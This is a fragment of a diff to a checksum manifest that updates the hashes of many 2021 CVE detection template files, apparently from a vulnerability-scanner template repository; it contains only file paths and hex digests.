-http/cves/2021/CVE-2021-29006.yaml:48df1946bc4922b68389c03eb991d38872e3e387 -http/cves/2021/CVE-2021-29156.yaml:93a8a327af3566bf396611df96805e19371af7ef -http/cves/2021/CVE-2021-29200.yaml:0298aa937d5f983e48ee7ec9667132c77a005506 -http/cves/2021/CVE-2021-29203.yaml:fdf9afa70263f92a455fc71446859dc5862318e0 +http/cves/2021/CVE-2021-28937.yaml:647e7448f2a3b3555298e351de5a7dba0d958a09 +http/cves/2021/CVE-2021-29006.yaml:3f6d3f064325f17fe590a38bbae392526e5ed5a9 +http/cves/2021/CVE-2021-29156.yaml:5814b1158661cceb1a262e7f34ff5040980e9d73 +http/cves/2021/CVE-2021-29200.yaml:e485da0092f467bdd1adb2cf7dfc544c61ac1f0f +http/cves/2021/CVE-2021-29203.yaml:b4b3c9702a7ba11de6bafd405b269b144634be84 http/cves/2021/CVE-2021-29441.yaml:437a19e0d1b5d31dea8ff40a951b703eb77e4136 -http/cves/2021/CVE-2021-29442.yaml:665b4957617c9f813063e4af7271c9df90fa998c -http/cves/2021/CVE-2021-29484.yaml:f78e59f184d5c43ff7966a2b6fba00554446b9d1 -http/cves/2021/CVE-2021-29490.yaml:40b5bea457e707732739b67380abd7976c51f14d +http/cves/2021/CVE-2021-29442.yaml:b2fd9c5467a913f80015e20ab5c1ff6fb5ea1950 +http/cves/2021/CVE-2021-29484.yaml:63aa82a7a51ab985cdf379e46d6b1598ec9a0683 +http/cves/2021/CVE-2021-29490.yaml:3a04e9e1ab6011b372335b1e7a7db8adcba0d00c http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 -http/cves/2021/CVE-2021-29622.yaml:79b2ae7f2667471da099f5594f532bbc00626580 -http/cves/2021/CVE-2021-29625.yaml:2316f6210b7a01141b776e42c609483a01c95895 -http/cves/2021/CVE-2021-3002.yaml:60618324e66630690c4b85faf6a5b38817601897 -http/cves/2021/CVE-2021-30049.yaml:da78546d4d231f264cf840eedd0596d543ab9453 -http/cves/2021/CVE-2021-30128.yaml:5d3c104ca678614f3c0b970fd3dab9975f35878c -http/cves/2021/CVE-2021-30134.yaml:7528c665e9c5128fe999de9ce7b20a371021ae74 -http/cves/2021/CVE-2021-30151.yaml:0176cff2127ea150798e811cf491ad321fa257ff -http/cves/2021/CVE-2021-3017.yaml:b4d10f41ce02a4b1781629b33ceead5d1ec3f5aa -http/cves/2021/CVE-2021-30175.yaml:f4d14a127f4adb77d1bbd80d4ca4a6efdb76ee7f -http/cves/2021/CVE-2021-3019.yaml:2d7ff341b2391dab52b1df3d9480235402f6ba87 -http/cves/2021/CVE-2021-30213.yaml:f2b8fab0003434dc8448afa8ff44574147ff895e -http/cves/2021/CVE-2021-30461.yaml:ae5caaa70c317e1d678d6bd0e6a4fcb9dacfcdc5 -http/cves/2021/CVE-2021-30497.yaml:97fe78906a2e7131d7a911231a974b78a052e74d -http/cves/2021/CVE-2021-3110.yaml:0c08cd7b5fdcf56a2b157015241027a63921631f -http/cves/2021/CVE-2021-31195.yaml:2e7b035feb9d204db16faf7e5c9c167ba7296aeb +http/cves/2021/CVE-2021-29622.yaml:4075eeaddf6bfc0e38ea03fdb817d651b72bf711 +http/cves/2021/CVE-2021-29625.yaml:f29c485158f863b71003a1d8b54b3564ccdf9baa +http/cves/2021/CVE-2021-3002.yaml:b17285115d6e7ca777078b433959aafc7fc49766 +http/cves/2021/CVE-2021-30049.yaml:10dfed32823f675d7a8200ad9f639d326269d9d9 +http/cves/2021/CVE-2021-30128.yaml:c2064c93ae1cfdae0666a78a041e01f454965dca +http/cves/2021/CVE-2021-30134.yaml:6365aa91075632c43c56867d35f0d5495d0aaa6a +http/cves/2021/CVE-2021-30151.yaml:a5823328a2e51b6e25209da97cfd262cd11028fb +http/cves/2021/CVE-2021-3017.yaml:e6968f807056416f2f6f95ce0b753c7da8f7bdf3 +http/cves/2021/CVE-2021-30175.yaml:3da6712428c20d2f6ed6992dc6c774347f8c6850 +http/cves/2021/CVE-2021-3019.yaml:919abc666f5c4da2d07307d5ad1a6afc76d8403b +http/cves/2021/CVE-2021-30213.yaml:17b564617db8472f9190ed3de84f2385dbcf5ad2 +http/cves/2021/CVE-2021-30461.yaml:24724b1de4aaf6be6836a99107b049804c1017b1 +http/cves/2021/CVE-2021-30497.yaml:558ffe9dd0dc5369a560ffaa5983f5ffc4ae0bbe +http/cves/2021/CVE-2021-3110.yaml:80f9e4876bf76ae9e6916913973ae364fe732628 +http/cves/2021/CVE-2021-31195.yaml:318357499b1e4df75f0af6df36aba00d2f1c9411 http/cves/2021/CVE-2021-31249.yaml:514a2d8097e60e15ab5d5dea64714e8293db2b3a -http/cves/2021/CVE-2021-31250.yaml:510484f661c8a5eb806e034d550dd56f280ab67e +http/cves/2021/CVE-2021-31250.yaml:609cc147261d689c2abfb6f60576bec2d1b390c1 http/cves/2021/CVE-2021-3129.yaml:58cf44f43956214483492f7c4f1664bd05036422 -http/cves/2021/CVE-2021-31537.yaml:a9f1fe45368a3e3827e833c9d11dfc6a44cc0423 -http/cves/2021/CVE-2021-31581.yaml:acf1aa9a035e4f2e7c6cb1096c07ee3ad6faf230 -http/cves/2021/CVE-2021-31589.yaml:79daef52554ca9a96ba3bf701512d0fedccb4bfb -http/cves/2021/CVE-2021-31602.yaml:fc9119f342e5273f86221d47e6b91f0cb514c22d -http/cves/2021/CVE-2021-31682.yaml:7b85f4d5958a0a04bf846b5fcad1f892ce034a0c -http/cves/2021/CVE-2021-31755.yaml:9df221862d345f3d9dc71da5754793a8019cf481 -http/cves/2021/CVE-2021-31805.yaml:729163b1c38d758778be71da7bab030ae84060e3 +http/cves/2021/CVE-2021-31537.yaml:3557e0e6c8c4258523542676e9c54cc4a864d01f +http/cves/2021/CVE-2021-31581.yaml:89e09bf6b0e67ec62e8545a13524c1af524cbad9 +http/cves/2021/CVE-2021-31589.yaml:7f4a33c1d82dbb7a2077ff41bed406c37eb16e2c +http/cves/2021/CVE-2021-31602.yaml:50a07c3242e430b8e02640df76722583bc2129b5 +http/cves/2021/CVE-2021-31682.yaml:80f81046e36750f26a3c45ebf7ed8e1f2ac20061 +http/cves/2021/CVE-2021-31755.yaml:ef66cafb9c455883d62a8674c444e6b657794052 +http/cves/2021/CVE-2021-31805.yaml:ee69e2d4f237e0c6eba34f2eab26551732340203 http/cves/2021/CVE-2021-31856.yaml:02f2f826362c783a35fa70eee7772941eaddcde1 -http/cves/2021/CVE-2021-31862.yaml:4fcfabb3d503bdd5809af389892ca53569217fcc +http/cves/2021/CVE-2021-31862.yaml:688f0289637d1e40b8a70c6fb14d7b4ad60232fb http/cves/2021/CVE-2021-32030.yaml:c0a4636874282c087cf32c8e177c73dd9f771710 http/cves/2021/CVE-2021-32172.yaml:8fdebff02b3d16ee1e990072fd53e435b1e8dac7 -http/cves/2021/CVE-2021-3223.yaml:087280fa99bb84c2ea0ee9e446ede3320cfb4923 +http/cves/2021/CVE-2021-3223.yaml:36219448b19905a79b4884f01b29465c01ef619a http/cves/2021/CVE-2021-32305.yaml:70d9951aa4e2a64bd18be918d669dde6a9a18cf2 -http/cves/2021/CVE-2021-32618.yaml:1282d29e43f0a00e93a6fceebed1750a42af490f +http/cves/2021/CVE-2021-32618.yaml:5c9dccd91eba0c070f7db1399560ccdc8a307650 http/cves/2021/CVE-2021-32682.yaml:31e0b4b5fdcf1ff4fb51b0f653ecfbce0ec0d9d2 http/cves/2021/CVE-2021-32789.yaml:03bf6b93c36208174b66afb4a806a53868ed54de http/cves/2021/CVE-2021-32819.yaml:380a8078feba8f1bc4e50b118a121f74d6cf25f8 -http/cves/2021/CVE-2021-32820.yaml:c8e898d2d63b318200ed63044d0be7334a2e6f1b -http/cves/2021/CVE-2021-32853.yaml:a302ac36b360947ff6847b91d294c2eae5e175a8 +http/cves/2021/CVE-2021-32820.yaml:57d867e0ffe0387cf8d39de537bc19f8de4a5ab4 +http/cves/2021/CVE-2021-32853.yaml:21fa7610aab9ab5f27e3e6c9e4546f7f6880d5d4 http/cves/2021/CVE-2021-3293.yaml:36aba5cc9aad3ae4e19921a3f84cdd1db53ae512 -http/cves/2021/CVE-2021-3297.yaml:58eae4a4ae0f9778f784f2a89812d0d7efea6bf7 -http/cves/2021/CVE-2021-33044.yaml:61d12f5ff81a01697bccb13ebc7783c0f0379d5f -http/cves/2021/CVE-2021-33221.yaml:e83450638e3076c8a7c7c62195f70a0e8ef04f7b -http/cves/2021/CVE-2021-33357.yaml:e09a609edcfc1dbbfa81e898edbcf669050bd7f2 +http/cves/2021/CVE-2021-3297.yaml:9d24a96563e4acab938b8f53508908f726e456ce +http/cves/2021/CVE-2021-33044.yaml:25f1d31729eb0d28735576ac71970f91a579f5e6 +http/cves/2021/CVE-2021-33221.yaml:fcf463a7a41b0beb75c543b35f6698c1703754c4 +http/cves/2021/CVE-2021-33357.yaml:cdb2be78509d3d61d0b585b0a4207af47cb45f89 http/cves/2021/CVE-2021-33544.yaml:fce70ffeea8d3bdb07f5f487869da319c7a95fa3 http/cves/2021/CVE-2021-33564.yaml:a82110635a2629a0c81dc6b2984959c690d0c393 -http/cves/2021/CVE-2021-33690.yaml:5fba756e95fdb710254fa52b0f94d01b385a281c -http/cves/2021/CVE-2021-3374.yaml:7e2ba6195d313809875158aef6303cfa35109727 -http/cves/2021/CVE-2021-3377.yaml:c628541a89f6574ac1df5984121133bb6a93c495 +http/cves/2021/CVE-2021-33690.yaml:87e4d72e0fad030fd83158fd1cd59f03ee052899 +http/cves/2021/CVE-2021-3374.yaml:0a10b39966d1393de6d2c5d5ccc8f7556e4dd2e4 +http/cves/2021/CVE-2021-3377.yaml:bd5e20bb66fd84b14fbcd1dbf118056c01fa2c56 http/cves/2021/CVE-2021-3378.yaml:a842331f8c0924d398887c3ec42f8fbac970903c -http/cves/2021/CVE-2021-33807.yaml:8c0c364ad5322aa852db62573b1f85ce906729a9 -http/cves/2021/CVE-2021-33851.yaml:66cc75332c3d13b4ec7982bf3ed6d125541638fa -http/cves/2021/CVE-2021-33904.yaml:53053b47f3a6476fefc5dc83d5e0ab34c74cbcdd +http/cves/2021/CVE-2021-33807.yaml:a61fda186347244feb571f28a9ef0372dda5bcee +http/cves/2021/CVE-2021-33851.yaml:f2cced7480d09d4f3f70ebb9667a5cf0395c40bc +http/cves/2021/CVE-2021-33904.yaml:7c9ab65dea3207c5d4d7ec0f0389e54ddd83041e http/cves/2021/CVE-2021-34370.yaml:a6bb7f8f166cf8c32e0d5413eb96c76d3fb3f6d1 -http/cves/2021/CVE-2021-34429.yaml:4d02f3a8a972903a32cbee4d2244d9d227c113e2 -http/cves/2021/CVE-2021-34473.yaml:dce8423d33c95d7d2ff9700c9b14069d8e7b7545 +http/cves/2021/CVE-2021-34429.yaml:72395ef74692d870bca3d7c36f10597ecf1399fd +http/cves/2021/CVE-2021-34473.yaml:a6fba055485ffd19a582007be3cd8ff1bbff72a8 http/cves/2021/CVE-2021-34621.yaml:56f9dc43ee199038f49466b0b480aa7a964ac31f -http/cves/2021/CVE-2021-34640.yaml:4b798f36995a8a9a0e922d49776f1c2839cb5ea4 -http/cves/2021/CVE-2021-34643.yaml:ead5c8a99d068a7efd4c77e39fe934efcd615bbd -http/cves/2021/CVE-2021-34805.yaml:021029dd251c517a00b5ba3e56ae1eb9f2f32bc0 -http/cves/2021/CVE-2021-35250.yaml:bd5dd5e44187fd1b6444d656e064ee53deb2018d -http/cves/2021/CVE-2021-35265.yaml:cc2ea3d5e1ea9eb0681482ddebf14f2c5d8e1867 +http/cves/2021/CVE-2021-34640.yaml:61caec8b6d0c93bdbe75e426edb560512c56fd42 +http/cves/2021/CVE-2021-34643.yaml:80ca06ba1c1cf0d691768d9f883c9e28fec4edc3 +http/cves/2021/CVE-2021-34805.yaml:225835eb377bfb001f9338527aaa371b464c7a8f +http/cves/2021/CVE-2021-35250.yaml:56665ee2ea1b6d9177011331cead60250b5c3ad2 +http/cves/2021/CVE-2021-35265.yaml:edea4e848e1cea0fc24c3d245a151bda41ddf95f http/cves/2021/CVE-2021-35323.yaml:d147477c5193b9fb927fdf34cf3903193413b232 -http/cves/2021/CVE-2021-35336.yaml:e7ec259d3153a783ccb7555af25139eb90120034 +http/cves/2021/CVE-2021-35336.yaml:6caae867947908ef1442faf0b50f91f399626a27 http/cves/2021/CVE-2021-35380.yaml:166a86250742c082425c822f746a97c97e9db37c -http/cves/2021/CVE-2021-35395.yaml:07c91891742e057d76e9549f0e9400c53061e0b6 -http/cves/2021/CVE-2021-35464.yaml:2cda8ca7381e839590c5b17e483262fde71bf415 -http/cves/2021/CVE-2021-35488.yaml:ad79addd0f52f8c6e3fef3121e04e2bdfcf3dc35 -http/cves/2021/CVE-2021-35587.yaml:e7afa55d4e91320829d4b282717c4f43e9294591 -http/cves/2021/CVE-2021-3577.yaml:704b09c1177c35ce4c5f70fbe04bcdb1950f3d01 -http/cves/2021/CVE-2021-36260.yaml:5c3d7e011562cc9e0ce4444d458c9eb32703afaf -http/cves/2021/CVE-2021-36356.yaml:695cae6079d51b30ad4ce06ebe0aefc2ef6684d2 -http/cves/2021/CVE-2021-36380.yaml:471575f635d42fe0c7d4dc85f0968af7d252ff1c -http/cves/2021/CVE-2021-36450.yaml:0ab298502a0faa1d6021749a8c4c6da0b2008f35 -http/cves/2021/CVE-2021-3654.yaml:fb18f0b2be0c9fdb7cbf3aed22e607001e883f9c -http/cves/2021/CVE-2021-36580.yaml:6e44d44ce13b5319a6e0bb94a75e59f629047f91 -http/cves/2021/CVE-2021-36748.yaml:4f7839fbd2d62b76eb95ad727776d722ed0d245b +http/cves/2021/CVE-2021-35395.yaml:4cc3ed2c5194767f8ca75ce92ba4dab526dc94c9 +http/cves/2021/CVE-2021-35464.yaml:e9e28056833f62649ffb18df6f4b85dbcc14c223 +http/cves/2021/CVE-2021-35488.yaml:dd54cb49aea94f5ef4450cfcbaa82faaa2b134d7 +http/cves/2021/CVE-2021-35587.yaml:d4afb690b5cf0918770a6ddfb4ab4bb2553c6775 +http/cves/2021/CVE-2021-3577.yaml:0a56135b1cbb7f3b10130898fd11a85f526751f4 +http/cves/2021/CVE-2021-36260.yaml:7ba20097cfe679697162daf4e4a38b512d0fba96 +http/cves/2021/CVE-2021-36356.yaml:11649c7f6aefe25455c99ea49cec69e162690899 +http/cves/2021/CVE-2021-36380.yaml:adf247b74181860c6c19fd249c8f064372c4ef46 +http/cves/2021/CVE-2021-36450.yaml:6fcb0b245765fb039a8203789dab679b428176a9 +http/cves/2021/CVE-2021-3654.yaml:a88d24822a0f499bfa14e006237babd366825c4d +http/cves/2021/CVE-2021-36580.yaml:edd21d1beb5fc1b3647b3f3dab0195e72f58b4b6 +http/cves/2021/CVE-2021-36748.yaml:fa9e34fc74625f7e72ea3230becaabb93eac54ff http/cves/2021/CVE-2021-36749.yaml:3b0a7b9a9d14edf603248b938e61d7db03f084a7 http/cves/2021/CVE-2021-36873.yaml:cbff75f79e65e669b04b3b174ef61d586109cc6b http/cves/2021/CVE-2021-37216.yaml:79f6fb2bedd55cef9c44cd8a90e800cbd1714802 -http/cves/2021/CVE-2021-37304.yaml:2bdd5e602dff0a62a2f81dfb8ff276f0e5c22bff -http/cves/2021/CVE-2021-37305.yaml:79497261752eaabaaea2bb3ba4b8588ba6a7eef1 -http/cves/2021/CVE-2021-37416.yaml:a35a69d682ff87c19c213b692a4beae203e7e7d1 +http/cves/2021/CVE-2021-37304.yaml:89e1a775a31a9c61d14b23d0f1bc0b11d8b8a812 +http/cves/2021/CVE-2021-37305.yaml:b1769dd81f876b2322c8ba43750029e933150eec +http/cves/2021/CVE-2021-37416.yaml:5ca48602ee0adc67ab7d08ce6b6afce5cb28e84e http/cves/2021/CVE-2021-37538.yaml:10b588b6c384ac1f6391bcca0f0cf5d2ecf3aca4 -http/cves/2021/CVE-2021-37573.yaml:19b836cb0ce068641c3e7e555d67bec5b39c83f9 -http/cves/2021/CVE-2021-37580.yaml:fa94ec24c6bc2443f6a295b06ebc0df4fd6e601b -http/cves/2021/CVE-2021-37589.yaml:080cb5ba18740b17a79ffce5f43aacf1d63d63bf -http/cves/2021/CVE-2021-37704.yaml:b1ed2950d338c676243d969692819725f2be17b2 -http/cves/2021/CVE-2021-37833.yaml:4e3d9a7c5f7d9b0a34be8a475cc33aa5434c23dc +http/cves/2021/CVE-2021-37573.yaml:5a4623024051f0460741bb0f43cf018eabe7083a +http/cves/2021/CVE-2021-37580.yaml:005d8b2e74cd0be9a1f0c4ce410c98d08a8dc351 +http/cves/2021/CVE-2021-37589.yaml:70ab465b5d1ae2126062e892ffbc91fcd81036a6 +http/cves/2021/CVE-2021-37704.yaml:addffcf9d763ea0a368d137d23172b5c89e16a02 +http/cves/2021/CVE-2021-37833.yaml:6c38bf5800c5fa8bf0ccbd4f8258b8a1258f465f http/cves/2021/CVE-2021-38314.yaml:e43ac750d1856a2d72b10c003a5f69fcb060db10 -http/cves/2021/CVE-2021-38540.yaml:35d024ab04458e8db16ff83c1150250efce19039 +http/cves/2021/CVE-2021-38540.yaml:7878fc4ef40a5157a72fea08d7e7d28879cd83e7 http/cves/2021/CVE-2021-38647.yaml:d12fa581ce2c5917cb43d5af2d8edc56a31d3808 -http/cves/2021/CVE-2021-38702.yaml:a76cde1410170a54785ec0c2ed4b0fcbf99437a4 -http/cves/2021/CVE-2021-38704.yaml:a1617b9e257439a847ae7fbaf10b3d9483ccc094 +http/cves/2021/CVE-2021-38702.yaml:937dc8484bbe5c93d0e84e8768a83db1add4c353 +http/cves/2021/CVE-2021-38704.yaml:3862195081ee44163006fc67f25d5cbd56396391 http/cves/2021/CVE-2021-38751.yaml:f73039cf9ee89c0ed2f5823ea7932261ebffa038 http/cves/2021/CVE-2021-39141.yaml:658ae606eefaee8e5ed50c513aff80caa008aa2f http/cves/2021/CVE-2021-39144.yaml:df10799e1ee8eb495557350715a2105e62845151 http/cves/2021/CVE-2021-39146.yaml:9ef18404257cb1565c85ab67df499d1adaf5152c http/cves/2021/CVE-2021-39152.yaml:27f978b5960d9eb90e9113b832f0ecdf0f1d54ad -http/cves/2021/CVE-2021-39165.yaml:c46e4a77a6436fadd0317c97c30fed720c5b7d09 -http/cves/2021/CVE-2021-39211.yaml:cdf0014833108570ed947011e2fb018800846eff -http/cves/2021/CVE-2021-39226.yaml:3f428cc8e16e0b874f2aed8dc794ca3e5372bce7 +http/cves/2021/CVE-2021-39165.yaml:e6fc6f34e2e87016f6a199dfbcbc1083a9532dae +http/cves/2021/CVE-2021-39211.yaml:8c283388ab4cb374d75f66a73008acfa1ed34107 +http/cves/2021/CVE-2021-39226.yaml:e0e9268fe2647cd38c4e255c94f034996525c183 http/cves/2021/CVE-2021-39312.yaml:eea2b37fd676c4075a9b388b8f27a51308c86f2e http/cves/2021/CVE-2021-39316.yaml:987c2e078d53725debd4637ce5c6d9f72914f683 -http/cves/2021/CVE-2021-39320.yaml:4da11bd04c1100c95d63586cbbea545754760040 +http/cves/2021/CVE-2021-39320.yaml:d55743bd0c30e3310dea7ffc7530dea784d1938f http/cves/2021/CVE-2021-39322.yaml:6408a97278c6cf53fa277c226aa71b95f766fb41 http/cves/2021/CVE-2021-39327.yaml:4b9e392a8aed5ba3712bfa79673e89e403616964 http/cves/2021/CVE-2021-39350.yaml:bc1436fd7acd615ef4528971efa6a5066aa3b4d1 -http/cves/2021/CVE-2021-39433.yaml:7d1d7f4e16f6fee2c425c16273e43f8142d0f2ee -http/cves/2021/CVE-2021-39501.yaml:d723e3ef80444a326cfbcb71657d3cb432d06a82 -http/cves/2021/CVE-2021-40149.yaml:de2fa38e40854a7b489efdb8dedf3aba0e81bd2a -http/cves/2021/CVE-2021-40150.yaml:c1a08ac6f5dec1dd86448a20e2fdef4f7276013f -http/cves/2021/CVE-2021-40323.yaml:6459e451a2784e99145aab12e0b99cfc798bce98 -http/cves/2021/CVE-2021-40438.yaml:0c90154c80bd3565602e13a944e5d5cafb524347 -http/cves/2021/CVE-2021-40539.yaml:b2fd13e2f6c7e04b850ff94ade764ab130662b46 -http/cves/2021/CVE-2021-40542.yaml:087f4922d827d8604bd09a556188877b2dccf605 -http/cves/2021/CVE-2021-40651.yaml:959f4704824808be91bcfe0738266a17115faeba +http/cves/2021/CVE-2021-39433.yaml:beec72dfa9c2836d611a71dd565dcb142a72da31 +http/cves/2021/CVE-2021-39501.yaml:ec5ad1d64e6c1246ab273c38b912fcbddd7637af +http/cves/2021/CVE-2021-40149.yaml:1676310c0067f153ab7305bba1472380a767a0a8 +http/cves/2021/CVE-2021-40150.yaml:19dbd3ac074a19d46cf672e82952cce57dc7d871 +http/cves/2021/CVE-2021-40323.yaml:497d6b22e1eccc32f89e716d8290750b9e130abe +http/cves/2021/CVE-2021-40438.yaml:6e016c28d12e67a00a23bcf35b0cfb22888eb797 +http/cves/2021/CVE-2021-40539.yaml:eabff516d0834f61841b5f29e1bc4fbe2f6fca41 +http/cves/2021/CVE-2021-40542.yaml:d24460225cb566c0790fa0cf0293e9ccd121a84a +http/cves/2021/CVE-2021-40651.yaml:d0c2949c384e736bbc945a24017f05aa28d30d38 http/cves/2021/CVE-2021-40661.yaml:f780fd916ac3f8d1c70ea104c4cbf11905176041 -http/cves/2021/CVE-2021-40822.yaml:cd334eabdae2efe8dba8e13de1ad9022c2683ed1 +http/cves/2021/CVE-2021-40822.yaml:97de64ee2998793338d9184a47c51605cd2f6437 http/cves/2021/CVE-2021-40856.yaml:4aadf3d80dd73b612020a8d1ca20c5111201a957 http/cves/2021/CVE-2021-40859.yaml:a8a6ab85fce3e1aab3d083ea9f6e20657d55a958 -http/cves/2021/CVE-2021-40868.yaml:ad6add8c1267887bc3a86a8a1a010d32abf4a5ac -http/cves/2021/CVE-2021-40870.yaml:842124570baf16773a52fe3d69d8a5a05259ae52 -http/cves/2021/CVE-2021-40875.yaml:f0fe555e8f66c1c6ff93f5bfaf55dd364a945efc -http/cves/2021/CVE-2021-40908.yaml:33321e29227bca645ee3c7ce9350fa3e6795ea11 +http/cves/2021/CVE-2021-40868.yaml:a56bcaccdc7226a4b01f50507ef4a5b829cb5f02 +http/cves/2021/CVE-2021-40870.yaml:11ada269b8beb5ea7aa3d62a68dbeedfd7a574f1 +http/cves/2021/CVE-2021-40875.yaml:f1df098a240419566a0da1c521e7d16b038af00e +http/cves/2021/CVE-2021-40908.yaml:ce2725650a88ab95a4d556943be0b731c227b9a1 http/cves/2021/CVE-2021-40960.yaml:0da341f855c1b922e90c84d04bd50f6b10c66eb9 -http/cves/2021/CVE-2021-40968.yaml:1344890ecb02ecc79c598b08803db689194562fe -http/cves/2021/CVE-2021-40969.yaml:45503ff040bdb468872b382c5a3bfeb75b871c50 -http/cves/2021/CVE-2021-40970.yaml:22537f287554d1fb3f08f08c3f7997c11a671af0 -http/cves/2021/CVE-2021-40971.yaml:79b2d87fa7d88703eb83a3b2f95b8264871ab70d -http/cves/2021/CVE-2021-40972.yaml:d27431d64ba53011509e840670cc2119f4dc6be9 -http/cves/2021/CVE-2021-40973.yaml:e4beb729c195766e7d1b9460eb88a622e2780258 -http/cves/2021/CVE-2021-40978.yaml:62ebc40431004d08ba54cf76229e706d2402c44a -http/cves/2021/CVE-2021-41174.yaml:4c24cd07dea7803624fb8d4cfa46b618c024d961 -http/cves/2021/CVE-2021-41192.yaml:601ba7b0718721723f1f23a60b055c0f03c7c755 +http/cves/2021/CVE-2021-40968.yaml:895232a56db6a7a97be40d4df4ca9a077580b7af +http/cves/2021/CVE-2021-40969.yaml:2c9bc3c0fc3481d3acd05f7dca5c2bdcab22680e +http/cves/2021/CVE-2021-40970.yaml:93c2c81ee58923603e9e76719ed3f265b354a6d9 +http/cves/2021/CVE-2021-40971.yaml:82479de07114ce2af5d9d054af5772e24fab4728 +http/cves/2021/CVE-2021-40972.yaml:5b1033503e68799ee48c7db99fe18022bbf90090 +http/cves/2021/CVE-2021-40973.yaml:cfebb17252bd68b2249cb86a685eee07c23f5c5b +http/cves/2021/CVE-2021-40978.yaml:69bfcf37ede0809cb9194d5537dac75694206fcc +http/cves/2021/CVE-2021-41174.yaml:f477462b5dd4cbb876d98c9b75e58aa99e70bbce +http/cves/2021/CVE-2021-41192.yaml:4cab8c9850131699d5522c858a61c02f55adfa07 http/cves/2021/CVE-2021-41266.yaml:8d081cc6e83f9e2b3397e60a81a16ec1a281b930 -http/cves/2021/CVE-2021-41277.yaml:8fda77b1487c28d680cc2eae21e04c291c2a660d -http/cves/2021/CVE-2021-41282.yaml:40c118c32ea07c6cbfab601a6e9c7999dd44ac79 -http/cves/2021/CVE-2021-41291.yaml:c3ef1e52bae2f2e5ff0f342ef10901a10c4ee0b2 -http/cves/2021/CVE-2021-41293.yaml:7b00e5acfba83ae6a436bf8ac2b242709f2e93a8 -http/cves/2021/CVE-2021-41349.yaml:a17dcc5a512d28681730ea5113d2c03e02d3bbe5 +http/cves/2021/CVE-2021-41277.yaml:1af9e26de8fd408f138f1ae8ea29f2f3772eb6bd +http/cves/2021/CVE-2021-41282.yaml:08dfe9f24d6edcba12decc8b0f52a30d4d111abc +http/cves/2021/CVE-2021-41291.yaml:8dfa8bb00874c95e87205cf611780c323317bbc1 +http/cves/2021/CVE-2021-41293.yaml:45713072befbaf77ed6f28d8582ce10f5d825984 +http/cves/2021/CVE-2021-41349.yaml:094ece33db1ffd227f413f689ec74783b821fb78 http/cves/2021/CVE-2021-41381.yaml:0a52047e8dde8f010728956b9e9d71088ddb87e8 -http/cves/2021/CVE-2021-41432.yaml:108764451699d58b7abcfa207dd9876e922507f1 +http/cves/2021/CVE-2021-41432.yaml:09b5dddb286ad439bc6a693c958d166f983b0ae5 http/cves/2021/CVE-2021-41460.yaml:ae7e6179c5d6ca32450f81c03fcaf39d34b8221d -http/cves/2021/CVE-2021-41467.yaml:e42e6139f99ba4b0e35d0551f535982f6226933e +http/cves/2021/CVE-2021-41467.yaml:5e6337c03bac6733a42d4bc9b8d0dc36f50178e8 http/cves/2021/CVE-2021-41569.yaml:2c2ba97cff9b68cc6c448a1fb49c4e190460d10d http/cves/2021/CVE-2021-41648.yaml:60e9dcc0e99f1df5353d44d464fb0b7cd0593caf -http/cves/2021/CVE-2021-41649.yaml:1820514e097581f98f0eb4dc207503bc05b80b3e +http/cves/2021/CVE-2021-41649.yaml:4bc0c7180842cade90762bf71eb0b3d96c96f590 http/cves/2021/CVE-2021-41653.yaml:3578aadef6ceea1b69fa0a6bf5a05a51afe45504 http/cves/2021/CVE-2021-41691.yaml:d5c6275154110bdc9d78c09dadce004287917630 -http/cves/2021/CVE-2021-41749.yaml:16c931996a6d3f32ba2693b16b550798570880f9 +http/cves/2021/CVE-2021-41749.yaml:8ebb8ac082d62b69b2b0512fa21901b5bb5f9387 http/cves/2021/CVE-2021-41773.yaml:90279d433d0c1af880ab2755946704d9729786bc http/cves/2021/CVE-2021-41826.yaml:a8141bbbbc83b841143f8ac04fbbf369f77d54c6 http/cves/2021/CVE-2021-41878.yaml:8e2605b78d43422b23f6e5e263977290e45e1ea9 -http/cves/2021/CVE-2021-4191.yaml:4782871134f63bda86531b05a80e5a394552a206 -http/cves/2021/CVE-2021-41951.yaml:22841428b97ac79944c55c7802d09785f5c1a552 -http/cves/2021/CVE-2021-42013.yaml:226f248c5ca9b84315138a8a254a4531b1ddc280 -http/cves/2021/CVE-2021-42063.yaml:3a937ef1458dccb6499734daab4bd68cad2f6dae +http/cves/2021/CVE-2021-4191.yaml:7b6890c08e0ea17ae011f8c97340db77e0a90639 +http/cves/2021/CVE-2021-41951.yaml:0374f8f953e5e675bc35f3f9b4ed514822a56f2b +http/cves/2021/CVE-2021-42013.yaml:a5fe8608cfd03f9f39c5cb3c615383f46af38d3b +http/cves/2021/CVE-2021-42063.yaml:fb21c370ffa8b569b5f3c0a9c5877a0024953afb http/cves/2021/CVE-2021-42071.yaml:748f0615ef4142655d78ba5d86dd052c447ad312 http/cves/2021/CVE-2021-42192.yaml:b812ebb74367408339a3d62bab21f8e1d2ae996a -http/cves/2021/CVE-2021-42237.yaml:a551450d4cbf7093947899db04aa8c33079bf324 +http/cves/2021/CVE-2021-42237.yaml:65d95d359203e835304459159321ad52af420af8 http/cves/2021/CVE-2021-42258.yaml:ad213c4af31afd36d0ff95b7e52260947aa2013d http/cves/2021/CVE-2021-42551.yaml:423c75207a7156988c7470f235754d787fc81dd5 -http/cves/2021/CVE-2021-42565.yaml:6944af37fd5d100670dffd02e52d7cb8a003bfeb -http/cves/2021/CVE-2021-42566.yaml:9e2905327566b76241afb6077014210b0e041592 -http/cves/2021/CVE-2021-42567.yaml:15c4be6b0e1a680776ef69afebce3f9ad19f42f8 -http/cves/2021/CVE-2021-42627.yaml:961bc850cac15f0aba94dfcdeda91774ea7b8f39 +http/cves/2021/CVE-2021-42565.yaml:b7050a52d1b9adc6589b30134c98ca7586b255fb +http/cves/2021/CVE-2021-42566.yaml:c8ae361a4557972af3ababd668677d47cbde2b99 +http/cves/2021/CVE-2021-42567.yaml:a80ad6215969060c0d6bc11412a6d1528c80ee57 +http/cves/2021/CVE-2021-42627.yaml:118a460e44bf332539c3bffe407752be1d66e97b http/cves/2021/CVE-2021-42663.yaml:f3023c6a997a0d8027972baaaf23a96c5c8e884b http/cves/2021/CVE-2021-42667.yaml:c19169cb40060f91bb99ef5323b157fa0fbf6297 -http/cves/2021/CVE-2021-42887.yaml:dfe8d47da07a7c37b5294acdd283c4c27dbdf753 -http/cves/2021/CVE-2021-43062.yaml:a2a6ba5ec2ce275fa2ffbb6b19af1b20dfc0a0c3 -http/cves/2021/CVE-2021-43287.yaml:924e0ab303bf4959fb489490c4a5592747b44abe 